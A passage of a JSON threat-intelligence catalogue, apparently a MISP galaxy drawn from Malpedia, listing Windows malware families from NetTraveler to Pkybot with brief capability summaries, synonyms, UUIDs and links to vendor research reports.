"https://malpedia.caad.fkie.fraunhofer.de/details/win.nettraveler", "https://www.proofpoint.com/us/threat-insight/post/nettraveler-apt-targets-russian-european-interests", "https://cdn.securelist.com/files/2014/07/kaspersky-the-net-traveler-part1-final.pdf" ], "synonyms": [ "TravNet" ], "type": [] }, "uuid": "3a26ee44-3224-48f3-aefb-3978c972d928", "value": "NetTraveler" }, { "description": "Netwire is a RAT, its functionality seems focused on password stealing and keylogging, but includes remote control capabilities as well.\r\n\r\nKeylog files are stored on the infected machine in an obfuscated form. The algorithm is:\r\n\r\n for i in range(0,num_read):\r\n buffer[i] = ((buffer[i]-0x24)^0x9D)&0xFF\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire", "http://researchcenter.paloaltonetworks.com/2014/08/new-release-decrypting-netwire-c2-traffic/", "https://www.circl.lu/pub/tr-23/", "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", "http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html", "https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data", "https://maskop9.wordpress.com/2019/01/30/analysis-of-netwiredrc-trojan/" ], "synonyms": [ "Recam" ], "type": [] }, "uuid": "1acd0c6c-7aff-462e-94ff-7544b1692740", "value": "NetWire RC" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neuron", "https://www.ncsc.gov.uk/alerts/turla-group-malware" ], "synonyms": [], "type": [] }, "uuid": "101c2c0e-c082-4b5a-b820-2da789e839d9", "value": "Neuron" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino", "https://securityblog.switch.ch/2017/07/07/94-ch-li-domain-names-hijacked-and-used-for-drive-by/", "http://www.peppermalware.com/2019/01/analysis-of-neutrino-bot-sample-2018-08-27.html", "https://blog.malwarebytes.com/threat-analysis/2015/08/inside-neutrino-botnet-builder/", "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet", "http://securitykitten.github.io/an-evening-with-n3utrino/", "https://blog.malwarebytes.com/threat-analysis/2017/02/new-neutrino-bot-comes-in-a-protective-loader/", "https://blog.malwarebytes.com/cybercrime/2017/01/post-holiday-spam-campaign-delivers-neutrino-bot/", "http://blog.trendmicro.com/trendlabs-security-intelligence/credit-card-scraping-kasidet-builder-leads-to-spike-in-detections/", "http://malware.dontneedcoffee.com/2014/06/neutrino-bot-aka-kasidet.html", "https://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex" ], "synonyms": [ "Kasidet" ], "type": [] }, "uuid": "3760920e-4d1a-40d8-9e60-508079499076", "value": "Neutrino" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino_pos", "https://securelist.com/neutrino-modification-for-pos-terminals/78839/", "https://securelist.com/jimmy-nukebot-from-neutrino-with-love/81667/" ], "synonyms": [ "Jimmy" ], "type": [] }, "uuid": "a954e642-4cf4-4293-a4b0-c82cf2db785d", "value": "Neutrino POS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.newcore_rat", "https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations" ], "synonyms": [], "type": [] }, "uuid": "f18b17a7-9124-42e8-a2f2-4a1a9839aee8", "value": "NewCore RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.newposthings", "https://blog.trendmicro.com/trendlabs-security-intelligence/newposthings-has-new-pos-things/", "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html", "https://asert.arbornetworks.com/lets-talk-about-newposthings/", "http://www.cyintanalysis.com/a-quick-look-at-a-likely-newposthings-sample/" ], "synonyms": [], "type": [] }, "uuid": "48f95941-8369-4f80-b2b4-abbacd4bc411", "value": "NewPosThings" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.newsreels", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "1d32e7c3-840e-4247-b28b-818cb1c4ae7c", "value": "NewsReels" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.new_ct", "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf" ], "synonyms": [ "CT" ], "type": [] }, "uuid": "ec50a75e-81f0-48b3-b1df-215eac646421", "value": "NewCT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nexster_bot", "https://twitter.com/benkow_/status/789006720668405760" ], "synonyms": [], "type": [] }, "uuid": "de3aae04-130b-4c5f-b67c-03f872e76697", "value": "Nexster Bot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nexus_logger", "http://researchcenter.paloaltonetworks.com/2017/03/unit42-nexuslogger-new-cloud-based-keylogger-enters-market/", "https://twitter.com/PhysicalDrive0/status/842853292124360706" ], "synonyms": [], "type": [] }, "uuid": "dd1408ac-e288-4389-87f3-7650706f1d51", "value": "NexusLogger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ngioweb", "https://research.checkpoint.com/ramnits-network-proxy-servers/" ], "synonyms": [], "type": [] }, "uuid": "35fd764f-8723-4663-9bbf-5b02a64ec02e", "value": "Ngioweb" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitlove", "https://www.fireeye.com/blog/threat-research/2015/05/nitlovepos_another.html" ], "synonyms": [], "type": [] }, "uuid": "1bdd56fe-beca-4652-af39-87b5e45ae130", "value": "nitlove" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%E2%80%93-TrickBot-and-Nitol/" ], "synonyms": [], "type": [] }, "uuid": "e1fb348b-5e2b-4a26-95af-431065498ff5", "value": "Nitol" }, { "description": "RedPacket Security describes NJRat as \"a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives.\"\r\n\r\nIt is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat", "http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf", "http://csecybsec.com/download/zlab/20171221_CSE_Bladabindi_Report.pdf", "http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/", "https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "http://blogs.360.cn/post/analysis-of-apt-c-37.html" ], "synonyms": [ "Bladabindi" ], "type": [] }, "uuid": "ff611c24-289e-4f2d-88d2-cfbf771a4e4b", "value": "NjRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nocturnalstealer", "https://www.proofpoint.com/us/threat-insight/post/thief-night-new-nocturnal-stealer-grabs-data-cheap" ], "synonyms": [], "type": [] }, "uuid": "94793dbc-3649-40a4-9ccc-1b32846ecb3a", "value": "Nocturnal Stealer" }, { "description": "Nokki is a RAT type malware which is believe to evolve from Konni RAT. This malware has been tied to attacks containing politically-motivated lures targeting Russian and Cambodian speaking individuals or organizations. Researchers discovered a tie to the threat actor group known as Reaper also known as APT37.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nokki", "https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/", "https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/" ], "synonyms": [], "type": [] }, "uuid": "f3cbe9ca-e65e-41af-8eb2-1e9877434124", "value": "Nokki" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nozelesn_decryptor" ], "synonyms": [], "type": [] }, "uuid": "6207668d-af17-44a6-97a2-e1b448264529", "value": "Nozelesn (Decryptor)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nransom", "https://twitter.com/malwrhunterteam/status/910952333084971008", "https://motherboard.vice.com/en_us/article/yw3w47/this-ransomware-demands-nudes-instead-of-bitcoin", "https://www.kaspersky.com/blog/nransom-nude-ransomware/18597/" ], "synonyms": [], "type": [] }, "uuid": "b9c767c7-a1e8-476a-8032-9686d51df7de", "value": "nRansom" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim", "https://www.cert.pl/en/news/single/nymaim-revisited/", "https://www.proofpoint.com/us/threat-insight/post/nymaim-config-decoded", "https://bitbucket.org/daniel_plohmann/idapatchwork", "https://arielkoren.com/blog/2016/11/02/nymaim-deep-technical-dive-adventures-in-evasive-malware/", "https://public.gdatasoftware.com/Web/Landingpages/DE/GI-Spring2014/slides/004_plohmann.pdf", "https://github.com/coldshell/Malware-Scripts/tree/master/Nymaim" ], "synonyms": [ "nymain" ], "type": [] }, "uuid": "9b5255c6-44e5-4ec3-bc03-7e00e220c937", "value": "Nymaim" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim2", "https://johannesbader.ch/2018/04/the-new-domain-generation-algorithm-of-nymaim/" ], "synonyms": [], "type": [] }, "uuid": "c8e8392f-883e-412e-9b0b-02137d0875da", "value": "Nymaim2" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.oceansalt", "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-oceansalt.pdf" ], "synonyms": [], "type": [] }, "uuid": "01cef4e7-a8a8-4b42-b509-f91c5d415354", "value": "Oceansalt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.octopus", "https://securelist.com/octopus-infested-seas-of-central-asia/88200/" ], "synonyms": [], "type": [] }, "uuid": "777b76f9-5390-4899-b201-ebaa8a329c96", "value": "Octopus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.oddjob" ], "synonyms": [], "type": [] }, "uuid": "d8305201-9fec-4e6b-9eec-7ebb756364e2", "value": "OddJob" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.odinaff", "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks" ], "synonyms": [], "type": [] }, "uuid": "045df65f-77fe-4880-af34-62ca33936c6e", "value": "Odinaff" }, { "description": "According to FireEye, OLDBAIT is a credential stealer that has been observed to be used by APT28.\r\nIt targets Internet Explorer, Mozilla Firefox, Eudora, The Bat! (an email client by a Moldovan company), and Becky! (an email client made by a Japanese company). It can use both HTTP or SMTP to exfiltrate data.\r\nIn some places it is mistakenly named \"Sasfis\", which however seems to be a completely different and unrelated malware family.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.oldbait", "https://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", "https://www.secjuice.com/fancy-bear-review/" ], "synonyms": [ "Sasfis" ], "type": [] }, "uuid": "b79a6b61-f122-4823-a4ab-bbab89fcaf75", "value": "OLDBAIT" }, { "description": "Malware which seems to have no function other than to disrupt computer systems related to the 2018 Winter Olympic event.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.olympic_destroyer", "http://blog.talosintelligence.com/2018/02/olympic-destroyer.html", "https://www.lastline.com/labsblog/olympic-destroyer-south-korea/", "https://securelist.com/the-devils-in-the-rich-header/84348/", "https://cyber.wtf/2018/03/28/dissecting-olympic-destroyer-a-walk-through/", "https://www.virusbulletin.com/virusbulletin/2018/10/vb2018-paper-who-wasnt-responsible-olympic-destroyer/", "https://securelist.com/olympic-destroyer-is-still-alive/86169/", "http://blog.talosintelligence.com/2018/02/who-wasnt-responsible-for-olympic.html", "https://www.lastline.com/labsblog/attribution-from-russia-with-code/", "https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/" ], "synonyms": [], "type": [] }, "uuid": "f3ba8a50-0105-4aa9-90b2-01df15f50b28", "value": "Olympic Destroyer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.onekeylocker", "https://twitter.com/malwrhunterteam/status/1001461507513880576" ], "synonyms": [], "type": [] }, "uuid": "838e2a3a-c4cb-4bee-b07f-c97b143c68d6", "value": "OneKeyLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.onhat", "https://docs.google.com/spreadsheets/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU/htmlview" ], "synonyms": [], "type": [] }, "uuid": "82733125-da67-44ff-b2ac-b16226088211", "value": "ONHAT" }, { "description": "OnionDuke is a new sophisticated piece of malware distributed by threat actors through a malicious exit node on the Tor anonymity network appears to be related to the notorious MiniDuke, researchers at F-Secure discovered. According to experts, since at least February 2014, the threat actors have also distributed the threat through malicious versions of pirated software hosted on torrent websites. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.onionduke", "https://www.f-secure.com/weblog/archives/00002764.html", "http://contagiodump.blogspot.com/2014/11/onionduke-samples.html" ], "synonyms": [], "type": [] }, "uuid": "abd10caa-7d4c-4c22-8dae-8d32f13232d7", "value": "OnionDuke" }, { "description": "A spambot that has been observed being used for spreading Ursninf, Zeus Panda, Andromeda or Netflix phishing against Italy and Canada.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.onliner", "https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html" ], "synonyms": [ "Onliner", "SBot" ], "type": [] }, "uuid": "6cf05dad-86c8-4f46-b5b8-0a004360563f", "value": "OnlinerSpambot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.oopsie", "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr", "https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/" ], "synonyms": [], "type": [] }, "uuid": "d07c3def-91af-4d9b-bdf7-62c9e0b44968", "value": "OopsIE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.opachki", "https://forum.malekal.com/viewtopic.php?t=21806", "https://isc.sans.edu/diary/Opachki%2C+from+%28and+to%29+Russia+with+love/7519", "http://contagiodump.blogspot.com/2009/11/win32opachkia-trojan-that-removes-zeus.html", "http://contagiodump.blogspot.com/2010/03/march-2010-opachki-trojan-update-and.html" ], "synonyms": [], "type": [] }, "uuid": "f50de0a8-35a7-406e-9f53-8f7d5448e1e7", "value": "Opachki" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.opghoul", "https://securelist.com/blog/research/75718/operation-ghoul-targeted-attacks-on-industrial-and-engineering-organizations/" ], "synonyms": [], "type": [] }, "uuid": "25a280b2-0260-4593-bf8c-7062dfdc6c38", "value": "OpGhoul" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.op_blockbuster", "http://researchcenter.paloaltonetworks.com/2017/04/unit42-the-blockbuster-sequel/" ], "synonyms": [], "type": [] }, "uuid": "25c962c5-5616-4fe3-ad44-68c4ac4c726d", "value": "OpBlockBuster" }, { "description": "FireEye details ORANGEADE as a dropper for the CREAMSICLE malware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.orangeade", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [], "type": [] }, "uuid": "092262b0-c631-400d-9f38-017cd59a14fd", "value": "ORANGEADE" }, { "description": "OrcaRAT is a Backdoor that targets the Windows platform. It has been reported that a variant of this malware has been used in a targeted attack. It contacts a remote server, sending system information. Moreover, it receives control commands to execute shell commands, and download/upload a file, among other actions.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcarat", "http://pwc.blogs.com/cyber_security_updates/2014/10/orcarat-a-whale-of-a-tale.html" ], "synonyms": [], "type": [] }, "uuid": "08103f1c-f83d-4037-a1ae-109b06f79226", "value": "OrcaRAT" }, { "description": "Orcus has been advertised as a Remote Administration Tool (RAT) since early 2016. It has all the features that would be expected from a RAT and probably more. The long list of the commands is documented on their website. But what separates Orcus from the others is its capability to load custom plugins developed by users, as well as plugins that are readily available from the Orcus repository. In addition to that, users can also execute C# and VB.net code on the remote machine in real-time.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcus_rat", "https://orcustechnologies.com/", "https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcoin-investors", "https://www.canada.ca/en/radio-television-telecommunications/news/2019/03/crtc-and-rcmp-national-division-execute-warrants-in-malware-investigation.html", "https://krebsonsecurity.com/2016/07/canadian-man-is-author-of-popular-orcus-rat/", "https://krebsonsecurity.com/2019/04/canadian-police-raid-orcus-rat-author/", "http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unusual-plugin-builder-rat/" ], "synonyms": [], "type": [] }, "uuid": "c41e7fdd-f1b1-4b87-97d7-634202af8b61", "value": "Orcus RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ordinypt", "https://www.bleepingcomputer.com/news/security/ordinypt-ransomware-intentionally-destroys-files-currently-targeting-germany/", "https://www.gdata.de/blog/2017/11/30151-ordinypt" ], "synonyms": [], "type": [] }, "uuid": "7fd96553-4c78-43de-824f-82645ed4fac5", "value": "Ordinypt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.outlook_backdoor", "https://www.welivesecurity.com/wp-content/uploads/2018/08/Eset-Turla-Outlook-Backdoor.pdf" ], "synonyms": [], "type": [] }, "uuid": "10a521e4-b3b9-4feb-afce-081531063e7b", "value": "Outlook Backdoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.overlay_rat", "https://securityintelligence.com/overlay-rat-malware-uses-autoit-scripting-to-bypass-antivirus-detection/", "https://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking" ], "synonyms": [], "type": [] }, "uuid": "842687f5-91bc-4719-ac3f-4166ae02e0cd", "value": "Overlay RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ovidiystealer", "https://www.proofpoint.com/us/threat-insight/post/meet-ovidiy-stealer-bringing-credential-theft-masses" ], "synonyms": [], "type": [] }, "uuid": "30d49b12-0dca-4652-9f7a-4d0cf7555375", "value": "OvidiyStealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.owaauth", "https://threatpost.com/targeted-attack-exposes-owa-weakness/114925/" ], "synonyms": [ "luckyowa" ], "type": [] }, "uuid": "37f66fcc-e093-4d97-902d-c96602a7d234", "value": "owaauth" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.padcrypt", "https://johannesbader.ch/2016/03/the-dga-of-padcrypt/", "https://www.bleepingcomputer.com/news/security/padcrypt-the-first-ransomware-with-live-support-chat-and-an-uninstaller/" ], "synonyms": [], "type": [] }, "uuid": "c21335f5-b145-4029-b1bc-161362c7ce80", "value": "PadCrypt" }, { "description": "Paladin RAT is a variant of Gh0st RAT used by PittyPanda active since at least 2011.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.paladin", "https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf", "https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html" ], "synonyms": [], "type": [] }, "uuid": "c6728a76-f4d9-4c49-a3aa-be895df13a35", "value": "paladin" }, { "description": "According to Arbor, Forcepoint and Proofpoint, Panda is a variant of the well-known Zeus banking trojan(*). Fox IT discovered it in February 2016.\r\n\r\nThis banking trojan uses the infamous ATS (Automatic Transfer System/Scripts) to automate online bank portal actions.\r\n\r\nThe baseconfig (c2, crypto material, botnet name, version) is embedded in the malware itself. It then obtains a dynamic config from the c2, with further information about how to grab the webinjects and additional modules, such as vnc, backsocks and grabber.\r\n\r\nPanda does have some DGA implemented, but according to Arbor, a bug prevents it from using it.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pandabanker", "https://github.com/JR0driguezB/malware_configs/tree/master/PandaBanker", "https://cyber.wtf/2017/02/03/zeus-panda-webinjects-a-case-study/", "https://www.proofpoint.com/us/threat-insight/post/zeus-panda-banking-trojan-targets-online-holiday-shoppers", "https://www.arbornetworks.com/blog/asert/panda-bankers-future-dga/", "https://f5.com/labs/articles/threat-intelligence/malware/panda-malware-broadens-targets-to-cryptocurrency-exchanges-and-social-media", "https://www.proofpoint.com/tw/threat-insight/post/panda-banker-new-banking-trojan-hits-the-market", "https://www.spamhaus.org/news/article/771/", "https://www.vkremez.com/2018/08/lets-learn-dissecting-panda-banker.html", "http://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html", "https://blogs.forcepoint.com/security-labs/zeus-panda-delivered-sundown-targets-uk-banks", "https://www.arbornetworks.com/blog/asert/panda-banker-zeros-in-on-japanese-targets/", "https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf", "https://www.arbornetworks.com/blog/asert/let-pandas-zeus-zeus-zeus-zeus/", "http://www.vkremez.com/2018/01/lets-learn-dissect-panda-banking.html", "https://cyber.wtf/2017/03/13/zeus-panda-webinjects-dont-trust-your-eyes/" ], "synonyms": [ "ZeusPanda" ], "type": [] }, "uuid": "31ebe294-f125-4cf3-95cc-f4150ab23303", "value": "PandaBanker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.parasite_http", "https://www.proofpoint.com/us/threat-insight/post/parasite-http-rat-cooks-stew-stealthy-tricks" ], "synonyms": [], "type": [] }, "uuid": "c5eee19f-0877-4709-86ea-328e346af1bf", "value": "parasite_http" }, { "description": "Peppy is a Python-based RAT with the majority of its appearances having similarities or definite overlap with MSIL/Crimson appearances. Peppy communicates to its C&C over HTTP and utilizes SQLite for much of its internal functionality and tracking of exfiltrated files. The primary purpose of Peppy may be the automated exfiltration of potentially interesting files and keylogs. Once Peppy successfully communicates to its C&C, the keylogging and exfiltration of files using configurable search parameters begins. Files are exfiltrated using HTTP POST requests.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.peepy_rat", "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf" ], "synonyms": [], "type": [] }, "uuid": "49321579-9dfe-45c6-80df-79467e4af65d", "value": "Peepy RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.penco" ], "synonyms": [], "type": [] }, "uuid": "a2fd9b8a-826d-4df5-9a29-d61a8456d086", "value": "Penco" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.petrwrap", "https://securelist.com/blog/research/77762/petrwrap-the-new-petya-based-ransomware-used-in-targeted-attacks/", "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/" ], "synonyms": [], "type": [] }, "uuid": "82ed8fae-552e-407b-b3fc-f617b7a8f996", "value": "PetrWrap" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.petya", "https://blog.malwarebytes.com/threat-analysis/2016/05/petya-and-mischa-ransomware-duet-p1/", "https://blog.malwarebytes.com/threat-analysis/2016/07/third-time-unlucky-improved-petya-is-out/", "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", "https://blog.malwarebytes.com/malwarebytes-news/2017/07/bye-bye-petya-decryptor-old-versions-released/", "https://blog.malwarebytes.com/threat-analysis/2016/04/petya-ransomware/" ], "synonyms": [], "type": [] }, "uuid": "34c9dbaa-97ac-4e1e-9eca-b7c492d67efc", "value": "Petya" }, { "description": "Information gathering and downloading tool used to deliver second stage malware to the infected system", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pgift", "https://community.fireeye.com/external/1093" ], "synonyms": [ "ReRol" ], "type": [] }, "uuid": "add29684-94b7-4c75-a43b-d039c4b76158", "value": "pgift" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.phandoor", "https://global.ahnlab.com/global/upload/download/techreport/[AhnLab]Andariel_a_Subgroup_of_Lazarus%20(3).pdf" ], "synonyms": [], "type": [] }, "uuid": "3a77d0d4-6fb1-4092-9fe3-bf1f51a6677c", "value": "PhanDoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.philadelphia_ransom", "https://www.bleepingcomputer.com/news/security/the-philadelphia-ransomware-offers-a-mercy-button-for-compassionate-criminals/", "https://www.cylance.com/en_us/blog/threat-spotlight-philadelphia-ransomware.html", "https://www.proofpoint.com/us/threat-insight/post/philadelphia-ransomware-customization-commodity-malware", "https://blogs.forcepoint.com/security-labs/shelf-ransomware-used-target-healthcare-sector", "https://krebsonsecurity.com/2017/03/ransomware-for-dummies-anyone-can-do-it/" ], "synonyms": [], "type": [] }, "uuid": "f2a10bec-4783-4cfc-8e93-acd3c12a517d", "value": "Philadephia Ransom" }, { "description": " Phoreal is a very simple backdoor that is capable of creating a reverse shell, performing simple file I/O and top-level window enumeration. It communicates to a list of four preconfigured C2 servers via ICMP on port 53", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.phoreal", "https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf" ], "synonyms": [ "Rizzo" ], "type": [] }, "uuid": "3aa6fd62-9b91-4136-af0e-08af7962ba4b", "value": "PHOREAL" }, { "description": "Proofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex", "https://www.johannesbader.ch/2016/02/phorpiex/", "https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/", "https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/", "https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows", "https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/" ], "synonyms": [ "Trik" ], "type": [] }, "uuid": "9759f99b-6d6c-4633-aa70-cb1d2bacc540", "value": "Phorpiex" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pipcreat", "https://www.snort.org/rule_docs/1-26941" ], "synonyms": [], "type": [] }, "uuid": "ea1c71fe-ad42-4c5a-8114-9ab9ecaa66f5", "value": "pipcreat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pirpi", "https://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/" ], "synonyms": [], "type": [] }, "uuid": "e2325481-006f-4ad4-86d9-1a2ae6fea154", "value": "pirpi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pitou", "https://www.tgsoft.it/english/news_archivio_eng.asp?id=884", "https://www.f-secure.com/documents/996508/1030745/pitou_whitepaper.pdf" ], "synonyms": [], "type": [] }, "uuid": "f371c85c-56f6-4ddf-8502-81866da4965b", "value": "Pitou" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pittytiger_rat", "https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf", "https://securingtomorrow.mcafee.com/mcafee-labs/targeted-attacks-on-french-company-exploit-multiple-word-vulnerabilities/" ], "synonyms": [], "type": [] }, "uuid": "7ac902e0-4a7d-4451-b0fd-cdf98fbe5018", "value": "PittyTiger RAT" }, { "description": "Pkybot is a trojan, which has its roots as a downloader dubbed Bublik in 2013 and was seen distributing GameoverZeus in 2014 (ref: fortinet). In the beginning of 2015, webinject capability was added according to /Kleissner/Kafeine/iSight using the infamous ATS.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pkybot", "http://blog.kleissner.org/?p=788", "https://blog.fortinet.com/2014/05/29/bublik-downloader-evolution", "http://webcache.googleusercontent.com/search?q=cache:JN3yRXXuYsYJ:https://www.arbornetworks.com/blog/asert/peeking-at-pkybot" ], "synonyms": [ "Bublik", "Pykbot", "TBag" ], "type": [] }, "uuid": "19d71f38-422c-48f4-9f90-867eb4d4182e", "value": "Pkybot" }, { 